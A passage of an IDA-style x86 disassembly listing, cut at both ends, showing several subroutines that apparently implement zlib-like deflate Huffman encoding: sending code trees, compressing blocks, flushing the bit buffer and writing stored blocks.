loc_9B0575: ; CODE XREF: sub_9B051B+50�j
cmp esi, ebx
jge loc_9B061A
loc_9B057D: ; CODE XREF: sub_9B051B+F4�j
movzx edi, word ptr [eax+edx*4+0A7Eh]
mov ecx, [eax+16BCh]
push 10h
pop ebx
sub ebx, edi
cmp ecx, ebx
jle short loc_9B05EB
movzx esi, word ptr [eax+edx*4+0A7Ch]
mov edx, esi
shl edx, cl
mov ecx, [eax+8]
or [eax+16B8h], dx
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov edx, [eax+8]
mov bl, [eax+16B9h]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, dl
shr si, cl
lea ecx, [edx+edi-10h]
mov edx, [ebp+var_10]
mov [eax+16B8h], si
mov esi, [ebp+var_4]
jmp short loc_9B0605
; ---------------------------------------------------------------------------
loc_9B05EB: ; CODE XREF: sub_9B051B+77�j
mov bx, [eax+edx*4+0A7Ch]
shl bx, cl
mov ecx, [eax+16BCh]
or [eax+16B8h], bx
add ecx, edi
loc_9B0605: ; CODE XREF: sub_9B051B+CE�j
dec esi
mov [eax+16BCh], ecx
mov [ebp+var_4], esi
jnz loc_9B057D
jmp loc_9B0983
; ---------------------------------------------------------------------------
loc_9B061A: ; CODE XREF: sub_9B051B+5C�j
test edx, edx
jz loc_9B07A5
cmp edx, [ebp+var_14]
jz loc_9B06BD
movzx edi, word ptr [eax+edx*4+0A7Eh]
mov ecx, [eax+16BCh]
push 10h
pop ebx
sub ebx, edi
cmp ecx, ebx
jle short loc_9B0699
movzx esi, word ptr [eax+edx*4+0A7Ch]
mov edx, esi
shl edx, cl
mov ecx, [eax+8]
or [eax+16B8h], dx
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov edx, [eax+8]
mov bl, [eax+16B9h]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, dl
shr si, cl
lea ecx, [edx+edi-10h]
mov edx, [ebp+var_10]
mov [eax+16B8h], si
mov esi, [ebp+var_4]
jmp short loc_9B06B3
; ---------------------------------------------------------------------------
loc_9B0699: ; CODE XREF: sub_9B051B+125�j
mov bx, [eax+edx*4+0A7Ch]
shl bx, cl
mov ecx, [eax+16BCh]
or [eax+16B8h], bx
add ecx, edi
loc_9B06B3: ; CODE XREF: sub_9B051B+17C�j
dec esi
mov [eax+16BCh], ecx
mov [ebp+var_4], esi
loc_9B06BD: ; CODE XREF: sub_9B051B+10A�j
movzx edi, word ptr [eax+0ABEh]
mov ecx, [eax+16BCh]
push 10h
pop ebx
sub ebx, edi
cmp ecx, ebx
mov [ebp+var_10], edi
jle short loc_9B072C
movzx esi, word ptr [eax+0ABCh]
mov edi, esi
shl edi, cl
mov ecx, [eax+8]
or [eax+16B8h], di
mov edi, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edi], bl
inc dword ptr [eax+14h]
mov ecx, [eax+8]
mov bl, [eax+16B9h]
mov edi, [eax+14h]
mov [edi+ecx], bl
mov ebx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, bl
shr si, cl
mov ecx, [ebp+var_10]
lea ecx, [ebx+ecx-10h]
mov [eax+16B8h], si
mov esi, [ebp+var_4]
jmp short loc_9B0742
; ---------------------------------------------------------------------------
loc_9B072C: ; CODE XREF: sub_9B051B+1B9�j
mov di, [eax+0ABCh]
shl di, cl
or [eax+16B8h], di
mov edi, [ebp+var_10]
add ecx, edi
loc_9B0742: ; CODE XREF: sub_9B051B+20F�j
add esi, 0FFFFFFFDh
cmp ecx, 0Eh
mov [eax+16BCh], ecx
jle short loc_9B0794
mov edi, esi
shl edi, cl
mov ecx, [eax+8]
or [eax+16B8h], di
mov edi, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edi], bl
inc dword ptr [eax+14h]
mov edi, [eax+14h]
mov ecx, [eax+8]
mov bl, [eax+16B9h]
mov [edi+ecx], bl
mov ebx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, bl
shr si, cl
add ebx, 0FFFFFFF2h
jmp loc_9B0880
; ---------------------------------------------------------------------------
loc_9B0794: ; CODE XREF: sub_9B051B+233�j
shl esi, cl
or [eax+16B8h], si
add ecx, 2
jmp loc_9B097D
; ---------------------------------------------------------------------------
loc_9B07A5: ; CODE XREF: sub_9B051B+101�j
cmp esi, 0Ah
mov ecx, [eax+16BCh]
push 10h
pop ebx
jg loc_9B08A3
movzx edi, word ptr [eax+0AC2h]
sub ebx, edi
cmp ecx, ebx
mov [ebp+var_10], edi
jle short loc_9B081D
movzx esi, word ptr [eax+0AC0h]
mov edi, esi
shl edi, cl
mov ecx, [eax+8]
or [eax+16B8h], di
mov edi, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edi], bl
inc dword ptr [eax+14h]
mov ecx, [eax+8]
mov bl, [eax+16B9h]
mov edi, [eax+14h]
mov [edi+ecx], bl
mov ebx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, bl
shr si, cl
mov ecx, [ebp+var_10]
lea ecx, [ebx+ecx-10h]
mov [eax+16B8h], si
mov esi, [ebp+var_4]
jmp short loc_9B0833
; ---------------------------------------------------------------------------
loc_9B081D: ; CODE XREF: sub_9B051B+2AA�j
mov di, [eax+0AC0h]
shl di, cl
or [eax+16B8h], di
mov edi, [ebp+var_10]
add ecx, edi
loc_9B0833: ; CODE XREF: sub_9B051B+300�j
add esi, 0FFFFFFFDh
cmp ecx, 0Dh
mov [eax+16BCh], ecx
jle short loc_9B0892
mov edi, esi
shl edi, cl
mov ecx, [eax+8]
or [eax+16B8h], di
mov edi, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edi], bl
inc dword ptr [eax+14h]
mov edi, [eax+14h]
mov ecx, [eax+8]
mov bl, [eax+16B9h]
mov [edi+ecx], bl
mov ebx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, bl
shr si, cl
add ebx, 0FFFFFFF3h
loc_9B0880: ; CODE XREF: sub_9B051B+274�j
; sub_9B051B+451�j
mov [eax+16B8h], si
mov [eax+16BCh], ebx
jmp loc_9B0983
; ---------------------------------------------------------------------------
loc_9B0892: ; CODE XREF: sub_9B051B+324�j
shl esi, cl
or [eax+16B8h], si
add ecx, 3
jmp loc_9B097D
; ---------------------------------------------------------------------------
loc_9B08A3: ; CODE XREF: sub_9B051B+296�j
movzx edi, word ptr [eax+0AC6h]
sub ebx, edi
cmp ecx, ebx
mov [ebp+var_10], edi
jle short loc_9B0909
movzx esi, word ptr [eax+0AC4h]
mov edi, esi
shl edi, cl
mov ecx, [eax+8]
or [eax+16B8h], di
mov edi, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edi], bl
inc dword ptr [eax+14h]
mov ecx, [eax+8]
mov bl, [eax+16B9h]
mov edi, [eax+14h]
mov [edi+ecx], bl
mov ebx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, bl
shr si, cl
mov ecx, [ebp+var_10]
lea ecx, [ebx+ecx-10h]
mov [eax+16B8h], si
mov esi, [ebp+var_4]
jmp short loc_9B091F
; ---------------------------------------------------------------------------
loc_9B0909: ; CODE XREF: sub_9B051B+396�j
mov di, [eax+0AC4h]
shl di, cl
or [eax+16B8h], di
mov edi, [ebp+var_10]
add ecx, edi
loc_9B091F: ; CODE XREF: sub_9B051B+3EC�j
add esi, 0FFFFFFF5h
cmp ecx, 9
mov [eax+16BCh], ecx
jle short loc_9B0971
mov edi, esi
shl edi, cl
mov ecx, [eax+8]
or [eax+16B8h], di
mov edi, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edi], bl
inc dword ptr [eax+14h]
mov edi, [eax+14h]
mov ecx, [eax+8]
mov bl, [eax+16B9h]
mov [edi+ecx], bl
mov ebx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, bl
shr si, cl
add ebx, 0FFFFFFF7h
jmp loc_9B0880
; ---------------------------------------------------------------------------
loc_9B0971: ; CODE XREF: sub_9B051B+410�j
shl esi, cl
or [eax+16B8h], si
add ecx, 7
loc_9B097D: ; CODE XREF: sub_9B051B+285�j
; sub_9B051B+383�j
mov [eax+16BCh], ecx
loc_9B0983: ; CODE XREF: sub_9B051B+FA�j
; sub_9B051B+372�j
xor esi, esi
cmp [ebp+var_8], esi
mov [ebp+var_14], edx
jnz short loc_9B0994
mov edi, 8Ah
jmp short loc_9B099C
; ---------------------------------------------------------------------------
loc_9B0994: ; CODE XREF: sub_9B051B+470�j
cmp edx, [ebp+var_8]
jnz short loc_9B09A0
push 6
pop edi
loc_9B099C: ; CODE XREF: sub_9B051B+477�j
push 3
jmp short loc_9B09A5
; ---------------------------------------------------------------------------
loc_9B09A0: ; CODE XREF: sub_9B051B+47C�j
push 7
pop edi
push 4
loc_9B09A5: ; CODE XREF: sub_9B051B+483�j
pop ebx
loc_9B09A6: ; CODE XREF: sub_9B051B+54�j
add [ebp+var_C], 4
dec [ebp+var_18]
jnz loc_9B0556
loc_9B09B3: ; CODE XREF: sub_9B051B+2B�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B051B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B09B8 proc near ; CODE XREF: sub_9B13EF+129�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [eax+16BCh]
cmp ecx, 0Bh
push ebx
mov ebx, [ebp+arg_8]
push esi
push edi
jle short loc_9B0A2A
mov esi, [ebp+arg_0]
add esi, 0FFFFFEFFh
mov edx, esi
shl edx, cl
mov ecx, [eax+14h]
mov [ebp+var_4], ebx
or [eax+16B8h], dx
mov bl, [eax+16B8h]
mov edx, [eax+8]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov bl, [eax+16B9h]
mov edx, [eax+8]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov ebx, [ebp+var_4]
mov cl, 10h
sub cl, dl
shr si, cl
add edx, 0FFFFFFF5h
mov [eax+16BCh], edx
mov [eax+16B8h], si
jmp short loc_9B0A45
; ---------------------------------------------------------------------------
loc_9B0A2A: ; CODE XREF: sub_9B09B8+13�j
mov edx, [ebp+arg_0]
add edx, 0FFFFFEFFh
shl edx, cl
or [eax+16B8h], dx
add ecx, 5
mov [eax+16BCh], ecx
loc_9B0A45: ; CODE XREF: sub_9B09B8+70�j
mov ecx, [eax+16BCh]
cmp ecx, 0Bh
jle short loc_9B0AA8
mov esi, [ebp+arg_4]
dec esi
mov edx, esi
shl edx, cl
mov ecx, [eax+14h]
mov [ebp+var_4], ebx
or [eax+16B8h], dx
mov bl, [eax+16B8h]
mov edx, [eax+8]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov bl, [eax+16B9h]
mov edx, [eax+8]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov ebx, [ebp+var_4]
mov cl, 10h
sub cl, dl
shr si, cl
add edx, 0FFFFFFF5h
mov [eax+16BCh], edx
mov [eax+16B8h], si
jmp short loc_9B0ABE
; ---------------------------------------------------------------------------
loc_9B0AA8: ; CODE XREF: sub_9B09B8+96�j
mov edx, [ebp+arg_4]
dec edx
shl edx, cl
or [eax+16B8h], dx
add ecx, 5
mov [eax+16BCh], ecx
loc_9B0ABE: ; CODE XREF: sub_9B09B8+EE�j
mov ecx, [eax+16BCh]
cmp ecx, 0Ch
jle short loc_9B0B20
lea esi, [ebx-4]
mov edx, esi
shl edx, cl
mov ecx, [eax+14h]
mov [ebp+var_4], ebx
or [eax+16B8h], dx
mov bl, [eax+16B8h]
mov edx, [eax+8]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov bl, [eax+16B9h]
mov edx, [eax+8]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov ebx, [ebp+var_4]
mov cl, 10h
sub cl, dl
shr si, cl
add edx, 0FFFFFFF4h
mov [eax+16BCh], edx
mov [eax+16B8h], si
jmp short loc_9B0B35
; ---------------------------------------------------------------------------
loc_9B0B20: ; CODE XREF: sub_9B09B8+10F�j
lea edx, [ebx-4]
shl edx, cl
or [eax+16B8h], dx
add ecx, 4
mov [eax+16BCh], ecx
loc_9B0B35: ; CODE XREF: sub_9B09B8+166�j
xor edi, edi
test ebx, ebx
jle loc_9B0BCE
loc_9B0B3F: ; CODE XREF: sub_9B09B8+210�j
mov ecx, [eax+16BCh]
cmp ecx, 0Dh
movzx edx, byte_9A581C[edi]
jle short loc_9B0BAA
movzx esi, word ptr [eax+edx*4+0A7Eh]
mov edx, esi
shl edx, cl
mov ecx, [eax+14h]
or [eax+16B8h], dx
mov bl, [eax+16B8h]
mov edx, [eax+8]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov bl, [eax+16B9h]
mov edx, [eax+8]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov ebx, [ebp+arg_8]
mov cl, 10h
sub cl, dl
shr si, cl
add edx, 0FFFFFFF3h
mov [eax+16BCh], edx
mov [eax+16B8h], si
jmp short loc_9B0BC5
; ---------------------------------------------------------------------------
loc_9B0BAA: ; CODE XREF: sub_9B09B8+197�j
mov dx, [eax+edx*4+0A7Eh]
shl dx, cl
or [eax+16B8h], dx
add ecx, 3
mov [eax+16BCh], ecx
loc_9B0BC5: ; CODE XREF: sub_9B09B8+1F0�j
inc edi
cmp edi, ebx
jl loc_9B0B3F
loc_9B0BCE: ; CODE XREF: sub_9B09B8+181�j
mov edx, [ebp+arg_0]
dec edx
lea ecx, [eax+94h]
call sub_9B051B
mov edx, [ebp+arg_4]
dec edx
lea ecx, [eax+988h]
call sub_9B051B
pop edi
pop esi
pop ebx
leave
retn
sub_9B09B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0BF1 proc near ; CODE XREF: sub_9B13EF+13E�p
; sub_9B13EF+1C8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
mov ebx, [ebp+arg_0]
xor ecx, ecx
cmp [eax+16A0h], ecx
push esi
push edi
jz loc_9B0F06
loc_9B0C0B: ; CODE XREF: sub_9B0BF1+30F�j
mov edx, [eax+16A4h]
movzx edi, word ptr [edx+ecx*2]
mov edx, [eax+1698h]
movzx esi, byte ptr [ecx+edx]
inc ecx
test edi, edi
mov [ebp+var_C], edi
mov [ebp+var_10], ecx
push 10h
jnz short loc_9B0CA6
mov ecx, [eax+16BCh]
lea esi, [ebx+esi*4]
movzx edi, word ptr [esi+2]
pop edx
sub edx, edi
cmp ecx, edx
jle short loc_9B0C92
movzx esi, word ptr [esi]
mov edx, esi
shl edx, cl
mov ecx, [eax+8]
or [eax+16B8h], dx
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov bl, [eax+16B9h]
mov edx, [eax+8]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov ebx, [ebp+arg_0]
mov cl, 10h
sub cl, dl
shr si, cl
lea ecx, [edx+edi-10h]
mov [eax+16B8h], si
jmp loc_9B0EF1
; ---------------------------------------------------------------------------
loc_9B0C92: ; CODE XREF: sub_9B0BF1+4D�j
mov dx, [esi]
shl dx, cl
or [eax+16B8h], dx
add ecx, edi
jmp loc_9B0EF1
; ---------------------------------------------------------------------------
loc_9B0CA6: ; CODE XREF: sub_9B0BF1+39�j
movzx edx, byte ptr dword_9A5F28[esi]
mov ecx, edx
shl ecx, 2
mov [ebp+var_4], ecx
movzx ecx, word ptr [ecx+ebx+406h]
pop ebx
sub ebx, ecx
mov [ebp+var_8], ecx
mov ecx, [eax+16BCh]
cmp ecx, ebx
jle short loc_9B0D27
mov edi, [ebp+arg_0]
movzx edi, word ptr [edi+edx*4+404h]
mov edx, edi
shl edx, cl
mov ecx, [eax+8]
or [eax+16B8h], dx
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov edx, [eax+8]
mov bl, [eax+16B9h]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, dl
shr di, cl
mov ecx, [ebp+var_8]
lea ecx, [edx+ecx-10h]
mov [eax+16B8h], di
mov edi, [ebp+var_C]
jmp short loc_9B0D41
; ---------------------------------------------------------------------------
loc_9B0D27: ; CODE XREF: sub_9B0BF1+DA�j
mov ebx, [ebp+arg_0]
mov dx, [ebx+edx*4+404h]
shl dx, cl
or [eax+16B8h], dx
mov edx, [ebp+var_8]
add ecx, edx
loc_9B0D41: ; CODE XREF: sub_9B0BF1+134�j
mov [eax+16BCh], ecx
mov ecx, [ebp+var_4]
mov edx, dword_9A56E0[ecx]
test edx, edx
mov [ebp+var_4], edx
jz short loc_9B0DC9
sub esi, dword_9A6028[ecx]
mov ecx, [eax+16BCh]
push 10h
pop ebx
sub ebx, edx
cmp ecx, ebx
jle short loc_9B0DB8
mov edx, esi
shl edx, cl
mov ecx, [eax+8]
or [eax+16B8h], dx
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov edx, [eax+8]
mov bl, [eax+16B9h]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, dl
shr si, cl
mov ecx, [ebp+var_4]
lea ecx, [edx+ecx-10h]
mov [eax+16B8h], si
jmp short loc_9B0DC3
; ---------------------------------------------------------------------------
loc_9B0DB8: ; CODE XREF: sub_9B0BF1+179�j
shl esi, cl
or [eax+16B8h], si
add ecx, edx
loc_9B0DC3: ; CODE XREF: sub_9B0BF1+1C5�j
mov [eax+16BCh], ecx
loc_9B0DC9: ; CODE XREF: sub_9B0BF1+164�j
dec edi
cmp edi, 100h
jnb short loc_9B0DDB
movzx ecx, byte_9A5D28[edi]
jmp short loc_9B0DE7
; ---------------------------------------------------------------------------
loc_9B0DDB: ; CODE XREF: sub_9B0BF1+1DF�j
mov ecx, edi
shr ecx, 7
movzx ecx, byte_9A5E28[ecx]
loc_9B0DE7: ; CODE XREF: sub_9B0BF1+1E8�j
mov esi, ecx
mov ecx, [ebp+arg_4]
shl esi, 2
lea edx, [esi+ecx]
movzx ecx, word ptr [edx+2]
push 10h
pop ebx
sub ebx, ecx
mov [ebp+var_8], ecx
mov ecx, [eax+16BCh]
cmp ecx, ebx
mov [ebp+var_4], esi
jle short loc_9B0E5D
movzx esi, word ptr [edx]
mov edx, esi
shl edx, cl
mov ecx, [eax+8]
or [eax+16B8h], dx
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov edx, [eax+8]
mov bl, [eax+16B9h]
mov [ecx+edx], bl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, dl
shr si, cl
mov ecx, [ebp+var_8]
lea ecx, [edx+ecx-10h]
mov [eax+16B8h], si
mov esi, [ebp+var_4]
jmp short loc_9B0E6F
; ---------------------------------------------------------------------------
loc_9B0E5D: ; CODE XREF: sub_9B0BF1+218�j
mov dx, [edx]
shl dx, cl
or [eax+16B8h], dx
mov edx, [ebp+var_8]
add ecx, edx
loc_9B0E6F: ; CODE XREF: sub_9B0BF1+26A�j
mov ebx, [ebp+arg_0]
mov [eax+16BCh], ecx
mov edx, dword_9A5758[esi]
test edx, edx
mov [ebp+var_4], edx
jz short loc_9B0EF7
sub edi, dword_9A60A0[esi]
push 10h
pop esi
sub esi, edx
cmp ecx, esi
jle short loc_9B0EE6
mov edx, edi
shl edx, cl
mov ecx, [eax+8]
mov [ebp+var_C], ebx
or [eax+16B8h], dx
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+8]
mov dl, [eax+16B9h]
mov esi, [eax+14h]
mov ebx, [ebp+var_C]
mov [esi+ecx], dl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, dl
shr di, cl
mov ecx, [ebp+var_4]
lea ecx, [edx+ecx-10h]
mov [eax+16B8h], di
jmp short loc_9B0EF1
; ---------------------------------------------------------------------------
loc_9B0EE6: ; CODE XREF: sub_9B0BF1+2A1�j
shl edi, cl
or [eax+16B8h], di
add ecx, edx
loc_9B0EF1: ; CODE XREF: sub_9B0BF1+9C�j
; sub_9B0BF1+B0�j ...
mov [eax+16BCh], ecx
loc_9B0EF7: ; CODE XREF: sub_9B0BF1+292�j
mov ecx, [ebp+var_10]
cmp ecx, [eax+16A0h]
jb loc_9B0C0B
loc_9B0F06: ; CODE XREF: sub_9B0BF1+14�j
movzx edx, word ptr [ebx+402h]
mov ecx, [eax+16BCh]
push 10h
pop esi
sub esi, edx
cmp ecx, esi
mov [ebp+arg_0], edx
jle short loc_9B0F78
movzx esi, word ptr [ebx+400h]
mov edx, esi
shl edx, cl
mov ecx, [eax+8]
mov [ebp+var_10], ebx
or [eax+16B8h], dx
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+8]
mov dl, [eax+16B9h]
mov edi, [eax+14h]
mov ebx, [ebp+var_10]
mov [edi+ecx], dl
mov edx, [eax+16BCh]
inc dword ptr [eax+14h]
mov cl, 10h
sub cl, dl
shr si, cl
mov ecx, [ebp+arg_0]
lea ecx, [edx+ecx-10h]
mov [eax+16B8h], si
jmp short loc_9B0F8B
; ---------------------------------------------------------------------------
loc_9B0F78: ; CODE XREF: sub_9B0BF1+32C�j
mov si, [ebx+400h]
shl si, cl
or [eax+16B8h], si
add ecx, edx
loc_9B0F8B: ; CODE XREF: sub_9B0BF1+385�j
mov [eax+16BCh], ecx
movzx ecx, word ptr [ebx+402h]
pop edi
pop esi
mov [eax+16B4h], ecx
pop ebx
leave
retn
sub_9B0BF1 endp
; =============== S U B R O U T I N E =======================================
sub_9B0FA3 proc near ; CODE XREF: sub_9B13EF+23�p
xor eax, eax
lea ecx, [edx+94h]
loc_9B0FAB: ; CODE XREF: sub_9B0FA3+15�j
cmp word ptr [ecx], 0
jnz short loc_9B0FBA
inc eax
add ecx, 4
cmp eax, 9
jl short loc_9B0FAB
loc_9B0FBA: ; CODE XREF: sub_9B0FA3+C�j
cmp eax, 9
jnz short loc_9B0FD7
push 0Eh
pop eax
lea ecx, [edx+0CCh]
loc_9B0FC8: ; CODE XREF: sub_9B0FA3+32�j
cmp word ptr [ecx], 0
jnz short loc_9B0FD7
inc eax
add ecx, 4
cmp eax, 20h
jl short loc_9B0FC8
loc_9B0FD7: ; CODE XREF: sub_9B0FA3+1A�j
; sub_9B0FA3+29�j
xor ecx, ecx
cmp eax, 20h
mov eax, [edx]
setz cl
mov [eax+2Ch], ecx
retn
sub_9B0FA3 endp
; =============== S U B R O U T I N E =======================================
sub_9B0FE5 proc near ; CODE XREF: sub_9B103C+9�p
; sub_9B13EF+1E0�j
mov ecx, [eax+16BCh]
cmp ecx, 8
push ebx
jle short loc_9B1015
mov edx, [eax+8]
push esi
mov esi, [eax+14h]
lea ecx, [eax+16B8h]
mov bl, [ecx]
mov [edx+esi], bl
inc dword ptr [eax+14h]
mov esi, [eax+8]
mov edx, [eax+14h]
mov cl, [ecx+1]
mov [edx+esi], cl
pop esi
jmp short loc_9B1028
; ---------------------------------------------------------------------------
loc_9B1015: ; CODE XREF: sub_9B0FE5+A�j
test ecx, ecx
jle short loc_9B102B
mov ecx, [eax+8]
mov edx, [eax+14h]
mov bl, [eax+16B8h]
mov [ecx+edx], bl
loc_9B1028: ; CODE XREF: sub_9B0FE5+2E�j
inc dword ptr [eax+14h]
loc_9B102B: ; CODE XREF: sub_9B0FE5+32�j
and word ptr [eax+16B8h], 0
and dword ptr [eax+16BCh], 0
pop ebx
retn
sub_9B0FE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B103C proc near ; CODE XREF: sub_9B1364+83�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push edi
mov ebx, ecx
mov edi, edx
call sub_9B0FE5
cmp [ebp+arg_0], 0
mov dword ptr [eax+16B4h], 8
jz short loc_9B1094
mov ecx, [eax+14h]
mov edx, [eax+8]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ecx, [eax+14h]
mov edx, [eax+8]
mov [ecx+edx], bh
inc dword ptr [eax+14h]
mov edx, [eax+8]
push esi
mov esi, [eax+14h]
mov cl, bl
not cl
mov [esi+edx], cl
inc dword ptr [eax+14h]
mov esi, [eax+14h]
mov edx, [eax+8]
mov ecx, ebx
not ecx
mov [esi+edx], ch
inc dword ptr [eax+14h]
pop esi
loc_9B1094: ; CODE XREF: sub_9B103C+1C�j
test ebx, ebx
jz short loc_9B10B0
loc_9B1098: ; CODE XREF: sub_9B103C+72�j
mov ecx, [eax+14h]
mov edx, [eax+8]
mov [ebp+arg_0], ebx
mov bl, [edi]
mov [ecx+edx], bl
inc dword ptr [eax+14h]
mov ebx, [ebp+arg_0]
inc edi
dec ebx
jnz short loc_9B1098
loc_9B10B0: ; CODE XREF: sub_9B103C+5A�j
pop edi
pop ebx
pop ebp
retn
sub_9B103C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B10B4 proc near ; CODE XREF: sub_9B1122+1DB�p
var_20 = word ptr -20h
var_1E = byte ptr -1Eh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push esi
xor ecx, ecx
push edi
lea esi, [ebp+var_1E]
xor edi, edi
xor eax, eax
inc ecx
sub edx, esi
loc_9B10C8: ; CODE XREF: sub_9B10B4+2C�j
lea esi, [edx+ecx*2]
movzx esi, [ebp+esi+var_20]
add si, ax
shl esi, 1
mov eax, esi
mov [ebp+ecx*2+var_20], ax
inc ecx
cmp ecx, 0Fh
jle short loc_9B10C8
cmp [ebp+arg_0], edi
jl short loc_9B111E
loc_9B10E7: ; CODE XREF: sub_9B10B4+68�j
movzx edx, word ptr [ebx+edi*4+2]
test edx, edx
jz short loc_9B1118
lea eax, [ebp+edx*2+var_20]
xor ecx, ecx
mov cx, [eax]
movzx esi, cx
inc ecx
mov [eax], cx
xor eax, eax
loc_9B1102: ; CODE XREF: sub_9B10B4+5C�j
mov ecx, esi
and ecx, 1
or eax, ecx
shr esi, 1
shl eax, 1
dec edx
test edx, edx
jg short loc_9B1102
shr eax, 1
mov [ebx+edi*4], ax
loc_9B1118: ; CODE XREF: sub_9B10B4+3A�j
inc edi
cmp edi, [ebp+arg_0]
jle short loc_9B10E7
loc_9B111E: ; CODE XREF: sub_9B10B4+31�j
pop edi
pop esi
leave
retn
sub_9B10B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1122 proc near ; CODE XREF: sub_9B1307+2E�p
; sub_9B13EF+2F�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_0]
mov eax, [edx+8]
mov ecx, [eax+0Ch]
or [ebp+var_8], 0FFFFFFFFh
push ebx
mov ebx, [eax]
xor eax, eax
test ecx, ecx
push edi
mov edi, [edx]
mov [ebp+var_4], ecx
mov [esi+1450h], eax
mov dword ptr [esi+1454h], 23Dh
jle loc_9B11D8
loc_9B1158: ; CODE XREF: sub_9B1122+67�j
cmp word ptr [edi+eax*4], 0
jz short loc_9B117F
inc dword ptr [esi+1450h]
mov ecx, [esi+1450h]
mov [esi+ecx*4+0B5Ch], eax
mov [ebp+var_8], eax
mov byte ptr [eax+esi+1458h], 0
jmp short loc_9B1185
; ---------------------------------------------------------------------------
loc_9B117F: ; CODE XREF: sub_9B1122+3B�j
and word ptr [edi+eax*4+2], 0
loc_9B1185: ; CODE XREF: sub_9B1122+5B�j
inc eax
cmp eax, [ebp+var_4]
jl short loc_9B1158
jmp short loc_9B11D8
; ---------------------------------------------------------------------------
loc_9B118D: ; CODE XREF: sub_9B1122+BD�j
cmp [ebp+var_8], 2
jge short loc_9B119B
inc [ebp+var_8]
mov eax, [ebp+var_8]
jmp short loc_9B119D
; ---------------------------------------------------------------------------
loc_9B119B: ; CODE XREF: sub_9B1122+6F�j
xor eax, eax
loc_9B119D: ; CODE XREF: sub_9B1122+77�j
inc dword ptr [esi+1450h]
mov ecx, [esi+1450h]
mov [esi+ecx*4+0B5Ch], eax
mov ecx, eax
shl ecx, 2
mov word ptr [ecx+edi], 1
mov byte ptr [esi+eax+1458h], 0
dec dword ptr [esi+16A8h]
test ebx, ebx
jz short loc_9B11D8
movzx eax, word ptr [ecx+ebx+2]
sub [esi+16ACh], eax
loc_9B11D8: ; CODE XREF: sub_9B1122+30�j
; sub_9B1122+69�j ...
cmp dword ptr [esi+1450h], 2
jl short loc_9B118D
mov eax, [ebp+var_8]
mov [edx+4], eax
mov eax, [esi+1450h]
cdq
